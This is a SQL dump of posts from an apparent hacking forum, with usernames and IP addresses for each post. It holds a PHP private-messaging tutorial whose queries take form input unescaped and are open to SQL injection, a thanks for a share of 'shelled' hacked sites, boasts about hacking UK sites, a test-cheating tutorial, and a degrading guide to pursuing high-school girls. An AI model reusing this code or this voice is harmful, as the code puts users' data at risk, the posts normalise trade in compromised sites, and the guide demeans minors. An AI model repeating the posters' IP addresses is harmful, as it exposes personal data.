should ban Monster Energy and investigate.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8b86517feb8a6ab19d5a50eafd2327a1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6558', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '5', 'Timmy', '1351463134', 'Nice idea. Thanks for making a L33T Hacking minecraft server.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'dfcb8ebd892209635a8b6b7dd481f61c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6559', '1074', '6244', '84', 'RE: [NEW] App Trailers Exploit [HOT!]', '0', '5', 'Timmy', '1351463559', 'Lol yeah he is smart and thanks.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4833d64180fe73e84bdbd342168d43a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6560', '281', '1335', '84', 'RE: Upload N Sell Exploit', '0', '5', 'Timmy', '1351463634', 'Thanks this is very useful but the problem is that you can only get one code per day.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e8fd15c5b892cd715a10b9e1696e0143', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6561', '1080', '6270', '13', 'RE: [FREASH] 4 ASP shelled sites!!!![hacked]', '0', '9', 'p420', '1351463824', 'Thanks for the shelled sites. Needed these for something.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '84863e0c65a69b630cb16aca3fb6e9d9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6562', '1128', '0', '67', '[TuT] Creating a PM system', '0', '9', 'p420', '1351465127', 'Several people ion the PHP section have asked about how to make a Private Messaging system, whether for a game, forum, Etc. Private Messaging is extremely simple to set up, and I will show it here. ok, since we need to connect to the Database on each page, i\'ve created one called \"config.php\". [php] <?php $localhost = \"$localhost\"; $mysqlusername = \"$mysqlusername\"; $mysqlpassword = \"$mysqlpassword\"; $db = \"$db\"; $con = mysql_connect($localhost, $mysqlusername, $mysqlpassword); mysql_select_db(\"$db\", $con); ?> [/php] First off, we need to create a table called \"messages\" in the DB we have selected. it will have the columns \"to_user\", \"message\", and \"from_user\", \"sent_deleted\", and \"deleted\". \"sent_deleted\" is for a user to delete the PM after they have sent it, whereas \"deleted\" tells us that the pm has been deleted by the receiver. Neither of the last two are necessary, but I like to keep them in the table for reference. [php]<?php //Connect to the Database require(\"config.php\"); //query to create the Table mysql_query(\"CREATE TABLE messages( to_user VARCHAR(30), from_user VARCHAR(30), deleted VARCHAR(3) DEFAULT no, sent_deleted VARCHAR(3) DEFAULT no, message VARCHAR(1000))\") or die(mysql_error()); echo \"Table Created!\"; ?> [/php] Secondly, we need to create a form to add the message into the database. I call this \"sendpm.php\". [php] <?php session_start(); require(\"config.php\"); $message = $_POST[\'forward2\']; if (isset($_POST[\'submit\'])) { // if the form has been submitted, this inserts it into the Database $to_user = $_POST[\'to_user\']; $from_user = $_POST[\'from_user\']; $message = $_POST[\'message\']; mysql_query(\"INSERT INTO messages (to_user, message, from_user) VALUES (\'$to_user\', \'$message\', \'$from_user\')\")or die(mysql_error()); echo \"PM succesfully sent!\"; } else { // if the form has not been submitted, this will show the form ?> <form action=\"<?php echo $_SERVER[\'PHP_SELF\']?>\" method=\"post\"> <table border=\"0\"> <tr><td colspan=2><h3>Send PM:</h3></td></tr> <tr><td></td><td> <input type=\"hidden\" name=\"from_user\" maxlength=\"32\" value = <?php echo $_SESSION[\'username\']; ?>> </td></tr> <tr><td>To User: </td><td> <input type=\"text\" name=\"to_user\" maxlength=\"32\" value = \"\"> </td></tr> <tr><td>Message: </td><td> <TEXTAREA NAME=\"message\" COLS=50 ROWS=10 WRAP=SOFT></TEXTAREA> </td></tr> <tr><td colspan=\"2\" align=\"right\"> <input type=\"submit\" name=\"submit\" value=\"Send Message\"> </td></tr> </table> </form> <?php } ?> [/php] I also decided to make an outbox, so users can view PMs they have sent. [php] <?php session_start(); require(\"config.php\"); $user = $_SESSION[\'username\']; if (isset($_POST[\'delete\'])) { $id = $_POST[\'id\']; mysql_query(\"UPDATE messages SET sent_deleted = \'yes\' WHERE from_user = \'$user\' AND id = \'$id\'\")or die(mysql_error()); echo \"Message succesfully deleted from your outbox.\"; } $user = $_SESSION[\'user\']; $sql = mysql_query(\"SELECT * FROM messages WHERE from_user = \'$user\' AND sent_deleted = \'no\'\")or die(mysql_error()); while($row = mysql_fetch_array( $sql )) { /* I have set each element into it\'s OWN echo statement for easy readind. however it is possible to create it in one echo statement like the following: echo \"Message ID#: \".$row[\'id\']; */ echo \"<table border=1>\"; echo \"<tr><td>\"; echo \"Message ID#: \"; echo $row[\'id\']; echo \"</td></tr>\"; echo \"<tr><td>\"; echo \"To: \"; echo $row[\'to_user\']; echo \"</td></tr>\"; echo \"<tr><td>\"; echo \"From: \"; echo $row[\'from_user\']; echo \"</td></tr>\"; echo \"<tr><td>\"; echo \"Message: \"; echo $row[message]; echo \"</td></tr>\"; echo \"</br>\"; ?> <form action=\"<?php echo $_SERVER[\'PHP_SELF\']?>\" method=\"post\"> <table border=\"0\"> <tr><td colspan=2></td></tr> <tr><td></td><td> <input type=\"hidden\" name=\"id\" maxlength=\"5\" value = \"<?php echo $row[\'id\']; ?>\"> </td></tr> <tr><td colspan=\"2\" align=\"right\"> <input type=\"submit\" name=\"delete\" value=\"Delete PM # <?php echo $row[\'id\']; ?> from outbox\"> </td></tr> </table> </form> <?php } echo \"</table>\"; echo \"</br>\"; ?> [/php] Lastly, we need the actual inbox, where users can view Private Messages that have been sent to them. [php] <?php session_start(); require(\"config.php\"); $user = $_SESSION[\'user\']; if (isset($_POST[\'view_old\'])) { $user = $_SESSION[\'user\']; $query = mysql_query(\"SELECT * FROM messages WHERE to_user = \'$user\' AND deleted = \'no\'\")or die(mysql_error()); while($row2 = mysql_fetch_array($query)) { echo \"<table border=1>\"; echo \"<tr><td>\"; echo \"Message ID#: \"; echo $row2[\'id\']; echo \"</td></tr>\"; echo \"<tr><td>\"; echo \"To: \"; echo $row2[\'to_user\']; echo \"</td></tr>\"; echo \"<tr><td>\"; echo \"From: \"; echo $row2[\'from_user\']; echo \" \"; echo \"</td></tr>\"; echo \"<tr><td>\"; echo \"Message: \"; echo bb ($row2[\'message\']); echo \"</td></tr>\"; echo \"</br>\"; ?> <form action=\"<?php echo $_SERVER[\'PHP_SELF\']?>\" method=\"post\"> <table border=\"0\"> <tr><td colspan=2></td></tr> <tr><td></td><td> <input type=\"hidden\" name=\"id\" maxlength=\"32\" value = \"<?php echo $row2[\'id\']; ?>\"> </td></tr> <tr><td colspan=\"2\" align=\"right\"> <input type=\"submit\" name=\"delete\" value=\"Delete PM # <?php echo $row2[\'id\']; ?>\"> </td></tr> </table> </form> <?php } } if (isset($_POST[\'delete\'])) { $id = $_POST[\'id\']; $user = $_SESSION[\'username\']; $sql = mysql_query(\"UPDATE messages SET deleted = \'yes\' WHERE id = \'$id\' AND to_user = \'$user\'\")or die(mysql_error()); echo \"Your message has been succesfully deleted.\"; } while($row = mysql_fetch_array($sql)) { $user = $_SESSION[\'user\']; echo \"<table border=1>\"; echo \"<tr><td>\"; echo \"Message ID#: \"; echo $row[id]; echo \"</td></tr>\"; echo \"<tr><td>\"; echo \"To: \"; echo $row[to_user]; echo \"</td></tr>\"; echo \"<tr><td>\"; echo \"From: \"; echo $row[from_user]; echo \"</td></tr>\"; echo \"<tr><td>\"; echo \"Message: \"; echo $row[message]; echo \"</td></tr>\"; echo \"</br>\"; mysql_query(\"UPDATE messages SET read_yet = \'yes\' WHERE to_user = \'$user\' AND id =\'$row_id\'\")or die(mysql_error()); ?> <form action=\"<?php echo $_SERVER[\'PHP_SELF\']?>\" method=\"post\"> <table border=\"0\"> <tr><td colspan=2></td></tr> <tr><td></td><td> <input type=\"hidden\" name=\"id\" maxlength=\"32\" value = \"<?php echo $row[\'id\']; ?>\"> </td></tr> <tr><td colspan=\"2\" align=\"right\"> <input type=\"submit\" name=\"delete\" value=\"Delete PM # <?php echo $row[\'id\']; ?>\"> </td></tr> </table> </form> <? } echo \"</table>\"; ?> [/php] (NOTE: this is an extremely simple PM system with NO security against SQL Injection. If you wish to prevent SQL Injection, I suggest you read some tutorials.)', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '0968757932b46044a09281d146292a04', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6563', '1102', '6412', '69', 'RE: What kinds of programs have you coded before', '0', '67', 'HoverCatz', '1351465333', '[b]Spotify[/b] (Vb.net) [b]Facebook[/b] (Html, Css) [b]Copy of hf[/b] (Html, css) [i](Working, not giving it out)[/i] [b]Minecraft 2d[/b] (Java)', '178.74.57.144', '-1303758448', '1', '0', '67', '1351465346', '1', 'd9d702855487ad6c7f58497c0c991b42', '0', '1351465346'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6564', '1102', '6412', '69', 'RE: What kinds of programs have you coded before', '0', '2', 'Apathy', '1351471896', 'I made calculators, for the most part I pay someone to code me whatever I want. :P', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', 'c0e4f724b344be0654ab31a7af7a513f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6565', '1128', '6562', '67', 'RE: [TuT] Creating a PM system', '0', '2', 'Apathy', '1351471928', 'Looks like a nice tutorial! Thanks for the share.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', 'bf07b5c1ea0f6f48796456daaff70430', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6566', '1074', '6244', '84', 'RE: [NEW] App Trailers Exploit [HOT!]', '0', '2', 'Apathy', '1351472106', 'Lol Already knew this method as I thought of it myself. To bad now it is going to get ruined. Nice share none the less.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', '6359f520cf2944e1681578ff0bc3acf2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6567', '656', '3267', '8', 'RE: why do ppl like this shitty song!?!?', '0', '262', 'RAND0M1ZER', '1351476053', 'lol, well at least you found some like minded people here on the forums. I\'m not a fan of it either.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '3ee115ef93b579d92de7a8c55ddde24e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6568', '1129', '0', '65', 'How do you watch your digital content', '0', '262', 'RAND0M1ZER', '1351476233', 'I was wondering what everyone did with their digital movies, shows, music, etc. In the past I had a huge binder of DVDs that I had burned or copied from various sources but now I\'ve moved on to a file server which I use to host all my files and then stream them across my house. Netflix is also getting pretty popular, but here in Canada I think my option is better.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '5281d8d5040028408e62e66f037c2da2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6569', '868', '4710', '71', 'RE: whats the best COD', '0', '262', 'RAND0M1ZER', '1351476720', 'Cod4 (the original MW) hands down. After that they just added too much BS to the game I found.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '19ddc360a1fa38835d638f676835ba83', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6570', '868', '4710', '71', 'RE: whats the best COD', '0', '82', 'iTzIpod', '1351480335', 'CoD Black Ops in my opinion <3 Maybe then, MW2 :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '671d5d32e814f3073e4f0a906b8f5473', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6571', '1130', '0', '83', '[Videos] Dancing with girls [Text tips included]', '0', '4', 'Triple H', '1351480386', 'If there\'s a dance party at school or somewhere it\'s better to go there with a couple of guy friends that can help you if you get into fights etc. If possible go with a girl or girls so you have someone to dance with, if not then go with some buddies and get some girl on the floor. [b]Dirty Dance moves[/b] [video=youtube]http://www.youtube.com/watch?v=uPrHAHWNN5o[/video] [b]Dirty dos and don\'ts[/b] [video=youtube]http://www.youtube.com/watch?v=l3rLk1Np9vA[/video] Now if you are tired don\'t dance alone, take a few mins break and go sit down somewhere and look around for some girl. If a girl is standing and dancing then go near her and dance but make her think that you understand her moves. If she is sitting then she won\'t dance but if she is just standing then ask her. If she gets too close then take her in the corner not to kiss or anything but for a bit more open dance. There would always be a group somewhere around, if you are alone for a few mins or some shit then go in the group and show your best moves. Never stick with the same girl for too long. [b]Ghetto Bounce[/b] [video=youtube]http://www.youtube.com/watch?v=QJ7zA1QqjY4[/video] [b]Dance in club by Howcast[/b] [video=youtube]http://www.youtube.com/watch?v=9HgmhjvhX7o[/video]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a8095bdd532955d1a57a467fb5724519', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6572', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '82', 'iTzIpod', '1351480411', 'We\'re discussing it not making it :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '49a6b4b5d1185a14cfc8aae2840a9ee1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6573', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351480511', '11/10 I love it. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3ae86d01cbc9ca3a7d4907ac286bd539', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6574', '1130', '6571', '83', 'RE: [Videos] Dancing with girls [Text tips included]', '0', '82', 'iTzIpod', '1351480609', 'Oo. I like how you added videos for a better visual and understanding! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6e2322376f490996061ec5c6830efadd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6575', '1131', '0', '83', '[Guide] Bagging whores in High School', '0', '4', 'Triple H', '1351481714', 'This guide shows how to bag whores in high school. [b]Requirements[/b] [list] [*] A phone with texting plan or BBM [*] Expensive clothing such as ralph lauren, american eagle etc [*] Time AFTER school [*] Sophomore or higher recommended [/list] [b]Step 1[/b] Find a cute girl walking around going to her next class or sitting in lunch but not a decent one. She must be someone who engages in conversations, open-minded, not wearing tooo many layers of clothing etc. Be careful, don\'t run up to her or block her way. It\'s recommended to be around her shoulder and don\'t stop her while she is walking or something. When you say something DO NOT LAUGH, keep a normal simile. [b]Step 2[/b] Go up to her and say \"What\'s up\". If she says what\'s up back then ask her name. If she doesn\'t say what\'s up back and replies back saying something like nothing much or hi then say \"hey what\'s your name?\" If she replies with the name [spoiler] Tell her what your name is. Then ask her what grade she is in. If she is going to her next class then escort her to the class. If there\'s time then ask her who the teacher is and does she like the class or not. Shut up after that. Meet her again the next day and be like what\'s up and ask her how she is today. Ask her if she has facebook or ask her if she likes texting. If she likes texting then give her your number. [/spoiler] If she doesn\'t reply with the name [spoiler] She will most likely ask why. Reply by saying you find her cute and would like to get to know her more. If she still doesn\'t talk then ask if you don\'t mind can you drop her off to her next class. If yes then on the way ask her what grade she is in etc then at the door ask the name again and tell your name. Meet her again the next day and be like what\'s up and ask her how she is then ask about what subject she has next and does she like the teacher or not. After that leave after saying bye even if you weren\'t by the class door it\'s cool. The third day try talking to her and crack a joke then ask her for her number or give your number. [/spoiler] If you take her number then ask her what time can you text her. Try avoiding the school timing for the first few days. Chat with her, talk her out to places or cut classes and walk with her etc. Get to know her more, tease her but don\'t cross the limit. Hug her when you meet her, be friendly. After a week or two ask her out. Remember she is a whore not some decent girl that you need to get to know her for 5 years. When you ask her out say this \"I find you cute, would you be my girl?\" (Asking her to be your GF without going out) OR \"I find you cute so would you go out with me?\" (Going on a date) If she says yes then kiss her on the lip, if not then say damn (not too loud) then smile. Say \"aight umm no problem, see ya around\". [b]Tips[/b] Don\'t bag any other girl around here for two weeks.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '98448b8e872c0ada8388fb55e6fd477d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6576', '1130', '6574', '83', 'RE: [Videos] Dancing with girls [Text tips included]', '0', '4', 'Triple H', '1351481778', '[quote=\'iTzIpod\' pid=\'6574\' dateline=\'1351480609\'] Oo. I like how you added videos for a better visual and understanding! :) [/quote] Thanks and check out my new tutorial on bagging girls in high school. http://l33thacking.net/thread-1131.html', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3baea9410b8b4d86f3857d385a97659e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6577', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '4', 'Triple H', '1351481841', '10/10 Liked my tutorial.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c69abeffb5fdb96826cd904b3ce22d88', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6578', '1132', '0', '83', '10 Rules for Dealing with Police', '0', '7', 'Romdu62', '1351481959', '[video=youtube]http://www.youtube.com/watch?v=s4nQ_mFJV4I[/video]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '84b20c9279835fe47a2d6f774752cad9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6579', '1133', '0', '83', '[Tutorial] Cheating on tests', '0', '7', 'Romdu62', '1351482382', '[b]Cheat # 1[/b] Write the answers or formulas at a bandage and put in on your hand. [b]Cheat # 2[/b] Write the ansewrs on the gum wrapper [b]Cheat # 3[/b] Write the answers between fingers so if they check the palm they can\'t see it. [b]Cheat # 4[/b] Take a eraser and press it hard on your textbook so the print can get copied on ereaser. [b]Cheat # 5[/b] Wear a jacket and stick paper on to your jacket but inside part so open the zip a little and put your hand on your foreheard. So it looks you are tired but you are actually looking inside your jacket to see the answer. Good Luck in cheating!', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '3dd5520ae2f679f56a9317f0a0f88d2c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6580', '1088', '6327', '49', 'RE: Best unique and useful suggestion', '0', '1', 't3h jok3r', '1351482501', 'Accepted and Added! /Closed.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5c45024edf07cdca18285106951fdb1d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6581', '1112', '6472', '49', 'RE: SUGGESTION', '0', '1', 't3h jok3r', '1351482601', 'Not a bad idea when it comes to repfuck. We have the repfuck feature but no one has gotten repfuck yet. We only repfuck scammers or rep abusers.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c178bf8606164c1c7a1b146363771bd6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6582', '1127', '6544', '42', 'RE: Up to 100 Hackers to be offered a Job at MI5 or MI6', '0', '258', 'PiXEL^OG', '1351502902', 'LMFAO I think im gonna go hack some UK sites now.. Just to piss these \"naughty boys\" off XD', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'ed0941501780458b07b4d0a4ed4009ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6583', '864', '4640', '79', 'RE: Need some coder to check this code', '0', '67', 'HoverCatz', '1351506225', 'For security, dont use that code on your home computer. I know about a \"bug\" with eval(gzinflate(base64_decode))). The bug is like, if you run it on your local machine, it will download a program from a url and run it without permission. But i cant be sure, its just something i know', '193.161.89.204', '-1046390324', '1', '0', '0', '0', '1', 'edda8bbe95617e3c0bd87026035b910f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6584', '1134', '0', '35', 'My new pet', '0', '67', 'HoverCatz', '1351506665', 'Hey. Took 2 mins to create my new pet in Photoshop :3', '193.161.89.202', '-1046390326', '1', '0', '0', '0', '1', '94880396c0b9044bf17b68680f5897f4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6585', '1128', '6562', '67', 'RE: [TuT] Creating a PM system', '0', '67', 'HoverCatz', '1351506888', 'Thanks, will help me a bit for my new forum.', '193.161.89.202', '-1046390326', '1', '0', '0', '0', '1', 'aa8d21c858f3d0317dc23960798ed1bf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6586', '1122', '6526', '25', 'RE: [TuT]How To Speed Up Your Computer', '0', '67', 'HoverCatz', '1351507960', 'HOLY SHIT this works O: O: :O :O !!! :O My school pc was SLOOOOOOOW then i ran this, and BOOM, gaming pc o.o', '193.161.89.202', '-1046390326', '1', '0', '0', '0', '1', '4e0b2ce4232dd32df60215da1c8f12bb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6587', '1133', '6579', '83', 'RE: [Tutorial] Cheating on tests', '0', '205', 'mothered', '1351508189', 'I like the one about the bandage. Never thought of that.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '46f42d6c4b839f1f9d53fb346b51130b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6588', '1127', '6544', '42', 'RE: Up to 100 Hackers to be offered a Job at MI5 or MI6', '0', '205', 'mothered', '1351508425', 'I\'ve heard hackers get hired by big corporations, to help protect their systems and business. This doesn\'t surprise me.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'e1a3a664be867b79e500abce5e2fb69d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6589', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '67', 'HoverCatz', '1351509115', 'Works :) But i cant sms and call D:', '193.161.89.202', '-1046390326', '1', '0', '0', '0', '1', '3ded7c235e9670527be7d4f9216a18f5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6590', '1127', '6588', '42', 'RE: Up to 100 Hackers to be offered a Job at MI5 or MI6', '0', '258', 'PiXEL^OG', '1351524858', '[quote=\'mothered\' pid=\'6588\' dateline=\'1351508425\'] I\'ve heard hackers get hired by big corporations, to help protect their systems and business. This doesn\'t surprise me. [/quote] MI5 and 6 are taking a piss , its known by everyone that they have been highly unorganized throughout time', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '6eb2b1504d649b73d3ea44fd67160b28', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6591', '1133', '6579', '83', 'RE: [Tutorial] Cheating on tests', '0', '228', 'VirtualLegend', '1351526418', 'Or just study for your tests', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 